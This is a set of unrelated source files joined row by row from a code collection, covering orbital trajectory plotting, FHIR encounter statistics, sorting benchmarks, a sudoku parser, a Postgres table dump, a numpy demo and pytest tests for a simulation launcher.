l = lambert_problem(r,r_P[0],T[0]*DAY2SEC,self.common_mu, False, False)
plot_lambert(ax,l, sol = 0, color='k', legend=False, units = JR, N=500)
#Lambert arc to reach seq[1]
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
#First DSM occuring at the very beginning (will be cancelled by the optimizer)
DV[0] = abs(norm(v_beg_l) - 3400)
#4 - And we proceed with each successive leg
for i in xrange(1,self.__n_legs):
#Fly-by
v_out = fb_prop(v_end_l,v_P[i-1],x[6+(i-1)*4]*self.seq[i-1].radius,x[5+(i-1)*4],self.seq[i-1].mu_self)
#s/c propagation before the DSM
r,v = propagate_lagrangian(r_P[i-1],v_out,x[4*i+3]*T[i]*DAY2SEC,self.common_mu)
plot_kepler(ax,r_P[i-1],v_out,x[7+(i-1)*4]*T[i]*DAY2SEC,self.common_mu,N = 500, color='b', legend=False, units = JR)
#Lambert arc to reach Earth during (1-nu2)*T2 (second segment)
dt = (1-x[7+(i-1)*4])*T[i]*DAY2SEC
l = lambert_problem(r,r_P[i],dt,self.common_mu, False, False)
plot_lambert(ax,l, sol = 0, color='r', legend=False, units = JR, N=500)
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
#DSM occuring at time nu2*T2
DV[i] = norm([a-b for a,b in zip(v_beg_l,v)])
plt.show()
def stats_leg(self,x):
import matplotlib as mpl
import matplotlib.pyplot as plt
#1 - we 'decode' the chromosome recording the various times of flight (days) in the list T for convenience
T = list([0]*(self.__n_legs))
for i in xrange(self.__n_legs):
T[i] = (x[4+4*i]/sum(x[4::4]))*x[3]
#2 - We compute the epochs and ephemerides of the planetary encounters
t_P = list([None] * (self.__n_legs))
r_P = list([None] * (self.__n_legs))
v_P = list([None] * (self.__n_legs))
DV = list([None] * (self.__n_legs))
close_d = list([None] * (self.__n_legs))
for i,planet in enumerate(self.seq):
t_P[i] = epoch(x[0]+sum(T[:i+1]))
r_P[i],v_P[i] = self.seq[i].eph(t_P[i])
#3 - We start with the first leg: a lambert arc
theta = 2*pi*x[1]
phi = acos(2*x[2]-1)-pi/2
r = [cos(phi)*sin(theta), cos(phi)*cos(theta), sin(phi)] #phi close to zero is in the moon orbit plane injection
r = [JR*1000*d for d in r]
l = lambert_problem(r,r_P[0],T[0]*DAY2SEC,self.common_mu, False, False)
#Lambert arc to reach seq[1]
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
close_d[0] = closest_distance(r,v_beg_l, r_P[0], v_end_l, self.common_mu)[0] / JR
#First DSM occuring at the very beginning (will be cancelled by the optimizer)
DV[0] = abs(norm(v_beg_l) - 3400)
#4 - And we proceed with each successive leg
for i in xrange(1,self.__n_legs):
#Fly-by
v_out = fb_prop(v_end_l,v_P[i-1],x[6+(i-1)*4]*self.seq[i-1].radius,x[5+(i-1)*4],self.seq[i-1].mu_self)
#s/c propagation before the DSM
r,v = propagate_lagrangian(r_P[i-1],v_out,x[7+(i-1)*4]*T[i]*DAY2SEC,self.common_mu)
tmp, ra = closest_distance(r_P[i-1],v_out, r,v, self.common_mu)
#Lambert arc to reach Earth during (1-nu2)*T2 (second segment)
dt = (1-x[7+(i-1)*4])*T[i]*DAY2SEC
l = lambert_problem(r,r_P[i],dt,self.common_mu, False, False)
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
tmp2, ra2 = closest_distance(r,v_beg_l, r_P[i], v_end_l, self.common_mu)
if tmp < tmp2:
close_d[i] = tmp/JR
ra = ra/JR
else:
close_d[i] = tmp2/JR
ra = ra2/JR
#DSM occuring at time nu2*T2
DV[i] = norm([a-b for a,b in zip(v_beg_l,v)])
symbol_dict = {
'io' : 'yo',
'europa' : 'bo',
'ganymede' : 'ro',
'callisto' : 'ko' }
for i in xrange(0,self.__n_legs):
if close_d[i] > 2:
#plt.plot(sum(DV), sum(T), symbol_dict[self.seq[0].name])
plt.plot(DV[i], T[i], symbol_dict[self.seq[i].name])
plt.plot(DV,T)
else:
print "\n the closest distance is less than 2*Rj "
plt.show()
def stats(self,x):
import matplotlib as mpl
import matplotlib.pyplot as plt
#1 - we 'decode' the chromosome recording the various times of flight (days) in the list T for convenience
T = list([0]*(self.__n_legs))
for i in xrange(self.__n_legs):
T[i] = (x[4+4*i]/sum(x[4::4]))*x[3]
#2 - We compute the epochs and ephemerides of the planetary encounters
t_P = list([None] * (self.__n_legs))
r_P = list([None] * (self.__n_legs))
v_P = list([None] * (self.__n_legs))
DV = list([None] * (self.__n_legs))
close_d = list([None] * (self.__n_legs))
for i,planet in enumerate(self.seq):
t_P[i] = epoch(x[0]+sum(T[:i+1]))
r_P[i],v_P[i] = self.seq[i].eph(t_P[i])
#3 - We start with the first leg: a lambert arc
theta = 2*pi*x[1]
phi = acos(2*x[2]-1)-pi/2
r = [cos(phi)*sin(theta), cos(phi)*cos(theta), sin(phi)] #phi close to zero is in the moon orbit plane injection
r = [JR*1000*d for d in r]
l = lambert_problem(r,r_P[0],T[0]*DAY2SEC,self.common_mu, False, False)
#Lambert arc to reach seq[1]
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
close_d[0] = closest_distance(r,v_beg_l, r_P[0], v_end_l, self.common_mu)[0] / JR
#First DSM occuring at the very beginning (will be cancelled by the optimizer)
DV[0] = abs(norm(v_beg_l) - 3400)
#4 - And we proceed with each successive leg
for i in xrange(1,self.__n_legs):
#Fly-by
v_out = fb_prop(v_end_l,v_P[i-1],x[6+(i-1)*4]*self.seq[i-1].radius,x[5+(i-1)*4],self.seq[i-1].mu_self)
#s/c propagation before the DSM
r,v = propagate_lagrangian(r_P[i-1],v_out,x[7+(i-1)*4]*T[i]*DAY2SEC,self.common_mu)
tmp, ra = closest_distance(r_P[i-1],v_out, r,v, self.common_mu)
#Lambert arc to reach Earth during (1-nu2)*T2 (second segment)
dt = (1-x[7+(i-1)*4])*T[i]*DAY2SEC
l = lambert_problem(r,r_P[i],dt,self.common_mu, False, False)
v_end_l = l.get_v2()[0]
v_beg_l = l.get_v1()[0]
tmp2, ra2 = closest_distance(r,v_beg_l, r_P[i], v_end_l, self.common_mu)
if tmp < tmp2:
close_d[i] = tmp/JR
ra = ra/JR
else:
close_d[i] = tmp2/JR
ra = ra2/JR
#DSM occuring at time nu2*T2
DV[i] = norm([a-b for a,b in zip(v_beg_l,v)])
#print "Total mission time (days): " + str(sum(T))
#print "Total DV (m/s): " + str(sum(DV))
symbol_dict = {
'io' : 'yo',
'europa' : 'bo',
'ganymede' : 'ro',
'callisto' : 'ko' }
#for i in xrange(0,self.__n_legs):
# plt.plot(sum(DV), sum(T), symbol_dict[self.seq[0].name])
#n = 0
ratio = list([0]*(self.__n_legs))
coeff = 0.3
for i in xrange(0,self.__n_legs):
ratio[i] = (DV[i]/(T[i]*DAY2SEC))
if close_d[0] >= 2:
if close_d[1] >= 2:
if close_d[2] >= 2:
if close_d[3] >= 2:
if ratio[1] <= coeff*(0.1/2000):
if ratio[2] <= coeff*(0.1/2000):
if ratio[3] <= coeff*(0.1/2000):
if ratio[0] <= coeff*(0.1/2000):
plt.plot(sum(DV), sum(T), symbol_dict[self.seq[0].name])
#for i in xrange(0,self.__n_legs):
# if close_d[i] > 2:
# plt.plot(sum(DV), sum(T), symbol_dict[self.seq[0].name])
# else:
# print "\n the closest distance is less than 2*Rj "
#print "\n number of sequences that do not crash " + str(n)
plt.show()
def human_readable_extra(self):
return ("\n\t Sequence: " + [pl.name for pl in self.seq].__repr__() +
"\n\t Time of flights: " + self.tof.__repr__())
|
984,670 | 79b1f02be4171c517d1ac21c107213d28eee37dc | import calendar
from typing import Dict
from collections import namedtuple
from db_tools.database import Encounter
from .tools import safe_get_value, safe_get_date, BaseProcess, ConvertException
# (day-of-week index, number of visits touching that day)
day_stat = namedtuple('day_stat', ['day', 'visit_amount'])
class EncounterProcess(BaseProcess):
    """Statistics processor for Encounter records.

    Counts how many encounters touch each weekday and reports the most and
    least popular day.
    """
    _model = Encounter
    # weekday index (0 = Monday) -> number of encounters touching that day.
    # NOTE(review): class-level mutable template -- assumes BaseProcess
    # copies it into self._result rather than mutating it in place; confirm.
    _result_template = {
        'days_visit': {i: 0 for i in range(7)}
    }

    def process_stat(self, entity: Dict):
        """Tally the weekdays spanned by one encounter.

        NOTE(review): iterating from start.weekday() to end.weekday() gives
        an empty range when the stay wraps past Sunday (end weekday < start
        weekday) and ignores full extra weeks -- confirm intended.
        """
        super().process_stat(entity)
        for i in range(entity['start_date'].weekday(), entity['end_date'].weekday() + 1):
            self._result['days_visit'][i] += 1

    def print_result(self):
        """Print the most and the least visited weekday."""
        super().print_result()
        most_popular: day_stat = None
        least_popular: day_stat = None
        # Single pass keeping the first day seen on ties (strict comparisons).
        for day, visit_amount in self._result['days_visit'].items():
            if most_popular is None or most_popular.visit_amount < visit_amount:
                most_popular = day_stat(day, visit_amount)
            if least_popular is None or least_popular.visit_amount > visit_amount:
                least_popular = day_stat(day, visit_amount)
        print(f"The most popular day is {calendar.day_name[most_popular.day]}")
        print(f"The least popular day is {calendar.day_name[least_popular.day]}")

    def entry_convert(self, raw_entry: Dict) -> Dict:
        """Validate one raw FHIR-style encounter entry and yield a row dict.

        Raises:
            ConvertException: when the id is missing, the referenced patient
                is unknown, or either period bound fails to parse.
        """
        if 'id' not in raw_entry or not raw_entry['id']:
            raise ConvertException("There is no required 'id' field in provided entry.")
        # 'subject.reference' looks like 'Patient/<id>'; strip the 8-char prefix.
        patient_source_id = safe_get_value(raw_entry, 'subject', 'reference')[8:]
        if patient_source_id not in self._context['patient_mapping']:
            raise ConvertException(f"The patient with source_id={patient_source_id} does not exist.")
        start_date = safe_get_date(raw_entry, 'period', 'start')
        if start_date is None:
            raise ConvertException(f"Not valid start_date")
        end_date = safe_get_date(raw_entry, 'period', 'end')
        if end_date is None:
            raise ConvertException(f"Not valid end_date")
        yield dict(
            source_id=raw_entry['id'],
            patient_id=self._context['patient_mapping'][patient_source_id],
            start_date=start_date,
            end_date=end_date,
            type_code=safe_get_value(raw_entry, 'type', 0, 'coding', 0, 'code'),
            type_code_system=safe_get_value(raw_entry, 'type', 0, 'coding', 0, 'system')
        )
|
984,671 | 445e32998a1dede6891e64a9c24b6c23c462d90a | import time
import random
def selection_sort(arr):
    """Sort *arr* in place in ascending order (selection sort, O(n^2)).

    Returns None, like list.sort().
    """
    n = len(arr)
    for k in range(n):
        # Find the index of the smallest element in the unsorted tail arr[k:].
        # (The original called this `min`, shadowing the builtin.)
        min_index = k
        for j in range(k + 1, n):
            if arr[j] < arr[min_index]:
                min_index = j
        if min_index != k:
            # Idiomatic tuple swap instead of a temporary variable.
            arr[k], arr[min_index] = arr[min_index], arr[k]
def insertion_sort(arr):
    """Sort *arr* in place in ascending order (insertion sort)."""
    for idx in range(1, len(arr)):
        value = arr[idx]
        pos = idx
        # Shift larger elements one slot right until value's place is found.
        while pos > 0 and arr[pos - 1] > value:
            arr[pos] = arr[pos - 1]
            pos -= 1
        arr[pos] = value
def increasing_order(arr, val):
    """Append 0, 1, ..., val-1 to *arr* (mutates it in place)."""
    arr.extend(range(val))
def decreasing_order(arr, val):
    """Append the integers val-1..0 to *arr* in descending order."""
    arr.extend(range(val - 1, -1, -1))
if __name__ == '__main__':
    # Benchmark insertion sort on already-sorted (best case) inputs.
    #
    # Fixes vs. original: the five copy-pasted timing stanzas are folded
    # into one loop, and the ~30 list variables that were built but
    # never used (asc*_B, des*, rand*, aList, temporary) are removed.
    # The printed report lines are unchanged.
    cases = [
        (1000, 'One Thousand'),
        (2500, 'Two Thousand Five Hundred'),
        (5000, 'Five Thousand'),
        (7500, 'Seven Thousand Five Hundred'),
        (10000, 'Ten Thousand'),
    ]
    for size, label in cases:
        data = list(range(size))
        start = time.process_time()
        insertion_sort(data)
        end = time.process_time()
        print(label + ' Increasing Insertion: ' + '{:.6f}'.format(end - start))
    # Sanity-check the list builders.
    temparr = []
    increasing_order(temparr, 1000)
    print(temparr)
    temporary = []
    decreasing_order(temporary, 1000)
    print(temporary)
# Demo of list containment, modulo and negative indexing (Python 2 syntax).
list2 = [1,2,3,4,5]
list1 = [1,2,3,4,5,6]
print "modulo", 9%9
# True when every element of list2 also occurs in list1.
result = all(elem in list1 for elem in list2)
if result:
    print("Yes, list1 contains all elements in list2")
else :
    print("No, list1 does not contains all elements in list2")
# list2[-1] is the last element (5), so this branch is taken.
if str(list2[-1]) != str(4):
    print "test"
def stringToList(string):
    """Rebuild a 9x9 grid of candidate-digit lists from its string form.

    The input is split on ']'; every digit character inside a chunk
    becomes one int, chunks without digits are dropped, and the first
    81 digit lists are laid out row-major into a 9x9 nested list.
    Raises IndexError if fewer than 81 digit groups are found.
    """
    cells = []
    for chunk in string.split("]"):
        digits = [int(ch) for ch in chunk if ch.isdigit()]
        if digits:
            cells.append(digits)
    return [[cells[row * 9 + col] for col in range(9)]
            for row in range(9)]
# A 9x9 sudoku candidate grid: solved cells hold a single digit, open
# cells hold the full 1-9 candidate list.
a = [[[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1], [7], [1, 2, 3, 4, 5, 6, 7, 8, 9], [8], [1, 2, 3, 4, 5, 6, 7, 8, 9], [2], [1, 2, 3, 4, 5, 6, 7, 8, 9]], [[6], [1, 2, 3, 4, 5, 6, 7, 8, 9], [4], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [7], [3]], [[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [4], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9]], [[4], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [5], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [9]], [[1, 2, 3, 4, 5, 6, 7, 8, 9], [8], [1, 2, 3, 4, 5, 6, 7, 8, 9], [3], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1], [2], [4], [1, 2, 3, 4, 5, 6, 7, 8, 9]], [[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [2], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [5], [1, 2, 3, 4, 5, 6, 7, 8, 9], [8]], [[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9]], [[1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [3], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9]], [[8], [5], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 3, 4, 5, 6, 7, 8, 9]]]
print len(a)
# Round-trip check: serialize the grid and parse it back with stringToList.
a = str(a)
stringToList(a)
|
984,673 | dc9c4ecb51fe3487a22dafe32ff78f1e9d9b7761 | import postgresql
file_name = 'tablStudent.txt'
# NOTE(review): database credentials are hard-coded in the DSN -- move
# them to configuration/environment before sharing this script.
db = postgresql.open("pq://postgres:G24O02d24230303@127.0.0.1:5432/my_db")
# Prepared statement; iterating it executes the query and yields rows.
tablStudent = db.prepare("select * from tstudent")
print('TablStudent :')
# Dump every row of tstudent to a text file inside one transaction.
with db.xact():
    with open(file_name,'w', encoding = 'UTF-8') as f:
        for row in tablStudent:
            f.write(str(row)+'\n')
# Read the dump back and echo it to stdout.
with open(file_name, 'r', encoding='UTF-8') as file:
    tablStudent = file.readlines()
    for row in tablStudent:
        print(row.rstrip())
984,674 | ff92ee5ec72c016ab07b1c58b10157dc66fab85b | #!/usr/bin/env python3
# Sum of squares 1^2 + 2^2 + ... + n^2 via the closed-form formula.
n = int(input())
total = n * (n + 1) * (2 * n + 1) // 6
print(total)
984,675 | 24be4f01491259ebf483b2e70e458774b26d0d12 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from tempest.lib.cli import base
class ClientTestBase(base.ClientTestBase):
    """Base class for ceilometerclient functional tests.

    Builds the CLI client from OS_* environment variables and exposes a
    convenience wrapper around the ``ceilometer`` command.
    """

    def _get_clients(self):
        """Create the CLIClient used by the tempest base class."""
        env = os.environ.get
        default_dir = os.path.join(os.path.abspath('.'),
                                   '.tox/functional/bin')
        cli_dir = env('OS_CEILOMETER_CLIENT_EXEC_DIR', default_dir)
        return base.CLIClient(username=env('OS_USERNAME'),
                              password=env('OS_PASSWORD'),
                              tenant_name=env('OS_TENANT_NAME'),
                              uri=env('OS_AUTH_URL'),
                              cli_dir=cli_dir)

    def ceilometer(self, *args, **kwargs):
        """Run the ceilometer CLI through the configured client."""
        return self.clients.ceilometer(*args, **kwargs)
|
984,676 | a12c5cf31ccbf8b3ed3b2ab19343fbbffa6fe857 | import numpy as np
# Demo: building a 2-D numpy array from a nested list and exploring it.
l = [ [5, 6, 9, 10, 11], [ 1, 2, 3, 5, 6 ] ]
print( l, type(l), len(l) )
arr = np.array( l )
print( f"arr = { arr }", type( arr ), len( arr ), arr.shape )
print( f"arr[0] = { arr[0] }" )
print()
print( "Printing Numpy Array in the loop" )
# Outer loop yields rows; inner loop yields the scalars of each row.
for i in arr:
    print( f"i : { i }", end=' and j : ' )
    for j in i:
        print( j, end=' -> ' )
    print()
# Broadcasting: assigning a scalar to a row fills the whole row with 9.
arr[1] = 9
print( "Checking Mutability, " )
print( f"arr = { arr }" )
# Single-element assignment inside the second row.
arr[1][3] = 5
print( f"arr = { arr }" )
print()
counter = 0
# Manual re-print of the original nested list in bracketed form.
# NOTE(review): 'counter' is never used below.
print( '[', end = '')
for i in range( len( l ) ):
    print( '[', end=' ' )
    for j in l[i]:
        print( j, end=' ' )
    if( i == ( len(l) - 1 ) ):
        print(']', end=']')
    else:
        print( ']' )
984,677 | 149547a1382999b470dc3dccc945bbe62688c309 | import pytest
import re
import os
import sys
import shutil
from pathlib import Path
from io import StringIO
from ast import literal_eval
from launch_multiple_simulations import Launcher
import institutionevolution.filemanip as fman
from institutionevolution.population import Population as Pop
from files import INITIALISATION_FILE, INITIAL_PHENOTYPES_FILE, INITIAL_TECHNOLOGY_FILE, PARAMETER_FILE, FITNESS_PARAMETERS_FILE
class TestAutomaticWorkflow(object):
    """End-to-end tests of the Launcher/Population simulation workflow.

    Every test builds a throw-away 'simulations' folder (usually from
    the 'test/test' fixture), runs part of the workflow, and removes the
    folder again, so the tests are independent but hit the real
    filesystem.
    """

    # A full single simulation reads inputs from and writes outputs to
    # the same folder.
    def test_single_sim_reads_and_writes_from_same_folder(self):
        dirpath = Path('simulations')
        if dirpath.exists() and dirpath.is_dir():
            shutil.rmtree(dirpath)
        shutil.copytree('test/test', 'simulations')
        self.pop = Pop(inst='simulations')
        self.pop.numberOfGenerations = 3
        self.pop.runSimulation()
        self.outputfiles = ["out_consensus.txt", "out_demography.txt", "out_phenotypes.txt", "out_resources.txt", "out_technology.txt"]
        for file in self.outputfiles:
            assert file in os.listdir('simulations')
        shutil.rmtree('simulations')

    def test_script_reads_arguments_properly(self):
        self.l = Launcher("tralala", "blablabla")
        assert self.l.metafolder == "tralala"
        assert self.l.parfile == "blablabla"

    def test_launcher_can_read_general_parameter_file(self):
        self.l = Launcher(metafolder="tralala", parfile="blablabla", launchfile="test/test/general_parameters.txt")
        assert self.l.strINITFILE == "numberOfDemes,10\ninitialDemeSize,20\nnumberOfGenerations,20\nindividualBaseResources,1"
        assert self.l.strPHENFILE == "0.0\n0.0\n0.0\n0.0"
        assert self.l.strTECHFILE == "1"
        assert self.l.strPARAFILE == "mutationRate,0.01\nmutationStep,0.02\nmigrationRate,0.5"

    def test_script_creates_metafolder(self):
        self.l = Launcher("simulations", "blablabla")
        self.l.createFolder(self.l.metafolder)
        assert os.path.exists('simulations') == 1, "did not create metafolder"
        shutil.rmtree('simulations')

    # One parameter combination produces one subfolder holding all five
    # input files.
    def test_script_writes_par_files(self):
        self.l = Launcher("simulations", "blablabla")
        self.l.createFolder(self.l.metafolder)
        self.l.writeParameterFilesInFolder(fitfun="func", pname=["first","secnd","third"], pval=[1,2,3])
        self.dirpath = os.getcwd()
        self.fileslist = os.listdir('simulations/func_first1secnd2third3')
        self.inputfiles = [INITIALISATION_FILE, INITIAL_PHENOTYPES_FILE, INITIAL_TECHNOLOGY_FILE, PARAMETER_FILE, FITNESS_PARAMETERS_FILE]
        try:
            for file in self.inputfiles:
                assert file in self.fileslist
            shutil.rmtree('simulations')
        except AssertionError as e:
            shutil.rmtree('simulations')
            assert False, "one or more parameter file(s) missing. Folder contents: {0}".format(self.fileslist)

    # Writing into an already-populated folder replaces the old files.
    def test_script_handles_files_already_exists_issue(self):
        shutil.copytree('test/test', 'simulations')
        self.l = Launcher('simulations', 'blablabla')
        self.l.writeParameterFilesInFolder(fitfun="func", pname=["first","secnd","third"], pval=[1,2,3])
        try:
            with open('simulations/func_first1secnd2third3/'+FITNESS_PARAMETERS_FILE, 'r') as f:
                assert len(f.readlines()) == 3, "file not replaced by correct parameter values"
            shutil.rmtree('simulations')
        except AssertionError as e:
            shutil.rmtree('simulations')
            assert False, "file not replaced by correct parameter values"

    def test_script_reads_parameter_ranges_file(self, createParameterRangesFile):
        # SIMPLE, NO RANGES
        createParameterRangesFile()
        self.l = Launcher('simulations', 'parameter_ranges.txt')
        self.l.readParameterInfo()
        #assert False, "names:{0},start:{1},end:{2},step:{3},fit:{4}".format(self.l.parname,self.l.parstart,self.l.parend,self.l.parstep,self.l.fitnessFunction)
        assert self.l.parname == ["first", "secnd", "third"]
        # NOTE(review): the next three comparisons lack 'assert' and are
        # no-ops -- they check nothing. Confirm intent before adding it.
        self.l.parstart == [1,2,3]
        self.l.parend == [None] * 3
        self.l.parstep == [None] * 3
        assert self.l.fitnessFunction == 'pgg', self.l.lastLine
        # WITH RANGES
        createParameterRangesFile(multi=True)
        #self.l = Launcher('simulations', 'parameter_ranges.txt')
        self.l.readParameterInfo()
        assert self.l.parname == ["first", "secnd", "third"]
        # NOTE(review): same here -- these comparisons are not asserted.
        self.l.parstart == [1.1,2.3,3.4]
        self.l.parend == [1.3,None,3.6]
        self.l.parstep == [0.1,None,0.1]
        assert self.l.fitnessFunction == 'pgg'
        os.remove('parameter_ranges.txt')

    # Bounds/steps stay as read (strings) and ranges are expanded from them.
    def test_ranges_creation(self, createParameterRangesFile):
        createParameterRangesFile(multi=True)
        self.l = Launcher('simulations', 'parameter_ranges.txt')
        self.l.readParameterInfo()
        assert self.l.parend == ['1.3',None,'3.6']
        assert self.l.parstep == ['0.1', None, '0.1']
        self.l.createRanges()
        assert self.l.parend == ['1.3',None,'3.6']
        assert self.l.parstep == ['0.1', None, '0.1']
        assert len(self.l.ranges) == 3, "wrong number of ranges"
        checkList = [[1.1,1.2],[2.3],[3.4,3.5]]
        for par in range(len(self.l.ranges)):
            assert pytest.approx(self.l.ranges[par]) == checkList[par], "wrong range for {0}: {1} when it should be {2}".format(self.l.parname[par],self.l.ranges[par],checkList[par])
        os.remove('parameter_ranges.txt')

    # The cartesian product of the per-parameter ranges is generated.
    def test_combinations_creation(self, createParameterRangesFile):
        createParameterRangesFile(multi=True)
        self.l = Launcher('simulations', 'parameter_ranges.txt')
        self.l.readParameterInfo()
        self.l.createRanges()
        self.l.createCombinations()
        allCombs = [(1.1,2.3,3.4),(1.1,2.3,3.5),(1.2,2.3,3.4),(1.2,2.3,3.5)]
        for parcomb in allCombs:
            assert pytest.approx(parcomb) in self.l.combinations
        os.remove('parameter_ranges.txt')

    def test_single_par_combination_gets_a_full_folder(self):
        self.l = Launcher('simulations', 'parameter_ranges.txt')
        self.l.createFolder(self.l.metafolder)
        self.l.writeParameterFilesInFolder(fitfun='pgg', pname=('small','big'), pval=(0.3,0.5))
        self.subfoldername = 'pgg_small0.3big0.5'
        assert os.path.exists('simulations/'+self.subfoldername), "create subfolder"
        self.fileslist = os.listdir('simulations/'+self.subfoldername)
        self.inputfiles = [INITIALISATION_FILE, INITIAL_PHENOTYPES_FILE, INITIAL_TECHNOLOGY_FILE, PARAMETER_FILE, FITNESS_PARAMETERS_FILE]
        try:
            for file in self.inputfiles:
                assert file in self.fileslist
            pars = fman.extractColumnFromFile('simulations/'+self.subfoldername+'/'+FITNESS_PARAMETERS_FILE, 0, str)
            vals = fman.extractColumnFromFile('simulations/'+self.subfoldername+'/'+FITNESS_PARAMETERS_FILE, 1, float)
            assert pars == ['small','big'], "wrong parameter name"
            assert vals == [0.3,0.5], "wrong parameter value"
            shutil.rmtree('simulations')
        except AssertionError as e:
            shutil.rmtree('simulations')
            assert False, "one or more parameter value(s) missing. File contents: {0},{1}".format(pars,vals)

    # Each combination from the ranges file gets its own correctly
    # populated subfolder.
    def test_script_reads_parameter_ranges_file_and_writes_files_correctly_in_different_folders(self, createParameterRangesFile):
        createParameterRangesFile(multi=True)
        self.l = Launcher('simulations', 'parameter_ranges.txt')
        self.l.writeParameterFilesInFolders()
        self.subfoldernames = ['pgg_first1.1secnd2.3third3.4','pgg_first1.1secnd2.3third3.5','pgg_first1.2secnd2.3third3.4','pgg_first1.2secnd2.3third3.5']
        self.parvalues = [[1.1,2.3,3.4],[1.1,2.3,3.5],[1.2,2.3,3.4],[1.2,2.3,3.5]]
        self.inputfiles = [INITIALISATION_FILE, INITIAL_PHENOTYPES_FILE, INITIAL_TECHNOLOGY_FILE, PARAMETER_FILE, FITNESS_PARAMETERS_FILE]
        for comb in range(len(self.parvalues)):
            folder = self.subfoldernames[comb]
            assert os.path.exists('simulations/'+folder), "did not create specific simulation file: {0}".format(os.listdir('simulations'))
            fileslist = os.listdir('simulations/'+folder)
            try:
                for file in self.inputfiles:
                    assert file in fileslist
                pars = fman.extractColumnFromFile('simulations/'+folder+'/'+FITNESS_PARAMETERS_FILE, 0, str)
                vals = fman.extractColumnFromFile('simulations/'+folder+'/'+FITNESS_PARAMETERS_FILE, 1, float)
                assert pars == ['first','secnd','third'], "wrong parameter name"
                assert pytest.approx(vals) == self.parvalues[comb], "wrong parameter value"
            except AssertionError as e:
                shutil.rmtree('simulations')
                os.remove('parameter_ranges.txt')
                assert False, "one or more parameter value(s) missing. File contents: {0},{1}".format(pars,vals)
        shutil.rmtree('simulations')
        os.remove('parameter_ranges.txt')

    def test_parameter_files_are_not_empty(self, createParameterRangesFile):
        createParameterRangesFile()
        self.l = Launcher('simulations', 'parameter_ranges.txt')
        self.l.writeParameterFilesInFolders()
        self.fileslist = os.listdir('simulations')
        try:
            for file in self.fileslist:
                assert os.path.getsize('simulations/'+file) != 0, "file is empty"
            shutil.rmtree('simulations')
            os.remove('parameter_ranges.txt')
        except AssertionError as e:
            shutil.rmtree('simulations')
            os.remove('parameter_ranges.txt')
            assert False, "file is empty"

    # 4 combinations x 5 input files each.
    def test_script_can_take_parameter_ranges(self, createParameterRangesFile):
        createParameterRangesFile(multi=True)
        self.l = Launcher('simulations', 'parameter_ranges.txt')
        self.l.writeParameterFilesInFolders()
        files = folders = 0
        for _, dirnames, filenames in os.walk('simulations'):
            # ^ this idiom means "we won't be using this value"
            files += len(filenames)
            folders += len(dirnames)
        shutil.rmtree('simulations')
        os.remove('parameter_ranges.txt')
        assert folders == 4, "wrong number of subfolders"
        assert files == 5*4, "wrong total number of parameters files"

    def test_script_can_launch_single_simulation(self):
        self.dir = 'simulations/pgg_test01'
        shutil.copytree('test/test', self.dir)
        self.l = Launcher('simulations', 'parameter_ranges.txt')
        sim = self.l.launchSimulation(path=self.dir)
        assert os.path.exists(self.dir)
        self.fileslist = os.listdir(self.dir)
        self.outputfiles = ['out_phenotypes.txt', 'out_demography.txt', 'out_technology.txt', 'out_resources.txt', 'out_consensus.txt']
        try:
            for file in self.outputfiles:
                assert file in self.fileslist, "file {0} missing from output".format(file)
            shutil.rmtree('simulations')
        except AssertionError as e:
            shutil.rmtree('simulations')
            assert False, "file {0} missing from output".format(file)

    # Output files contain one numeric line per generation (10 here).
    def test_single_simulation_output_not_empty(self):
        self.dir = 'simulations/pgg_test02'
        shutil.copytree('test/test', self.dir)
        assert os.path.isdir(self.dir), "not a directory"
